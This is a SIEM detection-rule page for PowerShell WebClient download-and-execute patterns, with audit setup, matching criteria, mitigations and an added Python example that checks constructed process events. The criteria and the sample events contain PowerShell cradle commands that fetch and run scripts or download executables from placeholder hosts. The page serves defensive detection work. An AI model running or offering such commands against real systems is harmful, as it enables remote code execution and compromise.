Suspicious PowerShell Download and Execute Pattern
About the rule
Rule Type
Standard
Rule Description
Detects suspicious PowerShell commands that use the .NET WebClient object to download and execute scripts or files from remote locations, a pattern commonly used in malicious scripts, stagers, or downloaders.
Severity
Trouble
Rule journey
Attack chain scenario
Execution: Command and Scripting Interpreter - PowerShell (T1059.001)
Impact
Execution of malicious code resulting in system compromise, data theft, or further malware deployment.
Rule Requirement
Prerequisites
Using Windows Event Viewer
- Open GPMC, create/edit a GPO.
- Navigate to: Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Audit Policies → Detailed Tracking
- Enable:
  - Audit Process Creation → Success
  - Audit Process Termination → Success
- To log command lines, navigate to: Computer Configuration → Administrative Templates → System → Audit Process Creation, and enable "Include command line in process creation events".
- Create registry key:
  Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Microsoft-Windows-Security-Auditing\Operational
Using Sysmon
- Download & install Sysmon from Sysinternals.
- Run it with a config file that includes process creation.
- Sample config must include ProcessCreate event.
- Create registry key:
  Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Microsoft-Windows-Sysmon\Operational
Criteria
Action1:
actionname = "Process started" AND COMMANDLINE contains "IEX ((New-Object Net.WebClient).DownloadString,IEX (New-Object Net.WebClient).DownloadString,IEX((New-Object Net.WebClient).DownloadString,IEX(New-Object Net.WebClient).DownloadString, -command (New-Object System.Net.WebClient).DownloadFile(, -c (New-Object System.Net.WebClient).DownloadFile("
select Action1.HOSTNAME,Action1.MESSAGE,Action1.COMMANDLINE,Action1.FILE_NAME,Action1.PROCESSNAME,Action1.USERNAME,Action1.PARENTPROCESSNAME,Action1.DOMAIN,Action1.ORIGINALFILENAME,Action1.PARENTPROCESSID,Action1.PROCESSID,Action1.PRODUCT_NAME,Action1.SECURITYID
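The criteria above are a plain substring ("contains") check over the process command line. The following added example (not part of the rule page or the rule author's code) applies the same six patterns to a few constructed process-creation events and returns the selected fields for each hit; it assumes case-insensitive matching, in line with the "downloadstring or downloadfile" wording in Next Steps, and uses placeholder hostnames and URLs.

```python
# Substrings from the rule's COMMANDLINE "contains" list (copied from the criteria above).
RULE_PATTERNS = [
    "IEX ((New-Object Net.WebClient).DownloadString",
    "IEX (New-Object Net.WebClient).DownloadString",
    "IEX((New-Object Net.WebClient).DownloadString",
    "IEX(New-Object Net.WebClient).DownloadString",
    "-command (New-Object System.Net.WebClient).DownloadFile(",
    "-c (New-Object System.Net.WebClient).DownloadFile(",
]

# Subset of the fields the rule's select clause returns.
SELECTED_FIELDS = ("HOSTNAME", "PARENTPROCESSNAME", "USERNAME", "COMMANDLINE")


def matches_rule(command_line: str) -> bool:
    """Substring check like the rule's 'contains'. Case-insensitive comparison is an
    assumption: PowerShell itself ignores case, so IEX and iex are the same cmdlet."""
    cl = command_line.lower()
    return any(p.lower() in cl for p in RULE_PATTERNS)


def evaluate(events):
    """Return the events the rule would alert on, reduced to the selected fields."""
    return [{k: ev[k] for k in SELECTED_FIELDS} for ev in events if matches_rule(ev["COMMANDLINE"])]


# Constructed sample "Process started" events; hostnames, users and URLs are placeholders.
SAMPLE_EVENTS = [
    {"HOSTNAME": "ws01", "PARENTPROCESSNAME": "winword.exe", "USERNAME": "CORP\\alice",
     "COMMANDLINE": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1')\""},
    {"HOSTNAME": "ws02", "PARENTPROCESSNAME": "explorer.exe", "USERNAME": "CORP\\bob",
     "COMMANDLINE": "powershell.exe -command (New-Object System.Net.WebClient).DownloadFile('http://placeholder.invalid/a.exe','C:\\Users\\Public\\a.exe')"},
    # Routine scheduled script: no download-and-execute pattern, so no alert.
    {"HOSTNAME": "srv01", "PARENTPROCESSNAME": "services.exe", "USERNAME": "NT AUTHORITY\\SYSTEM",
     "COMMANDLINE": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    # Same cradle as ws01 but lower-cased; caught only because matching is case-insensitive.
    {"HOSTNAME": "ws03", "PARENTPROCESSNAME": "cmd.exe", "USERNAME": "CORP\\carol",
     "COMMANDLINE": "powershell.exe -c \"iex(new-object net.webclient).downloadstring('http://placeholder.invalid/u.ps1')\""},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert["HOSTNAME"], alert["PARENTPROCESSNAME"], alert["USERNAME"], alert["COMMANDLINE"], sep=" | ")
```

The parent process and user in each hit are what an analyst uses to separate a document-spawned cradle from the installer and updater activity listed under Known False Positives.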
Detection
Execution Mode
realtime
Log Sources
Windows
MITRE ATT&CK
T1059.001: Command and Scripting Interpreter - PowerShell
Security Standards
Use antivirus/antimalware solutions to detect and quarantine suspicious scripts. Enforce PowerShell execution policies to permit only signed scripts. Restrict or disable PowerShell and WinRM where not needed. Use application control and PowerShell Constrained Language Mode to limit dangerous commands. Apply privileged account management, including Just Enough Administration (JEA).
Author
Florian Roth (Nextron Systems)
Future actions
Known False Positives
Legitimate software installers or updaters that download and execute packages remotely can trigger this detection.
Next Steps
Review PowerShell command executions involving downloadstring or downloadfile for suspicious activity. Harden PowerShell usage policies to restrict execution to authorized administrators. Monitor process creation and network traffic for anomalous or unauthorized downloads. Educate users on PowerShell best practices and risks. Deploy endpoint detection solutions with behavioral analytics.
Mitigation
| Mitigation ID | Name | Description |
|---|---|---|
| M1049 | Antivirus/Antimalware | Use antivirus solutions to detect and quarantine malicious PowerShell scripts that download and execute remote code. |
| M1045 | Code Signing | Enforce PowerShell execution policies to allow only signed scripts, reducing risk from unauthorized script execution. |
| M1042 | Disable or Remove Feature | Remove or restrict PowerShell and WinRM in environments where not needed to reduce remote execution attack surface. |
| M1038 | Execution Prevention | Utilize application control and PowerShell Constrained Language Mode to restrict execution of potentially harmful commands and scripts. |
| M1026 | Privileged Account Management | Limit PowerShell script execution rights to administrators via Just Enough Administration (JEA) to decrease attack surface. |